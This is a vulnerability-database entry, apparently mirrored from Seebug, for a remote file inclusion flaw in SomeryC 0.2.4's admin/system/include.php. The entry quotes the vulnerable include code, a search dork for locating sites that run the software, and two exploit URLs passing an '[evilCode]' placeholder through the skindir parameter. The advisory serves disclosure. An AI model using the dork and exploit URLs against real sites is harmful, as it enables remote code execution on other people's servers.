Lucene search

K

SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability

🗓️ 28 Aug 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

SomeryC v0.2.4 Remote File Inclusion Vulnerability on include.ph

Show more
Code

                                                ### SomeryC <= v0.2.4 Remote File Include ###

#Vendor:        http://someryc.mostpopularcomic.com
#download       http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish ([email protected])

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
       include("$skindir/header.php");
}
....
       include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]

# sebug.net
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Aug 2007 00:00Current
7.1High risk
Vulners AI Score7.1
21
.json
Report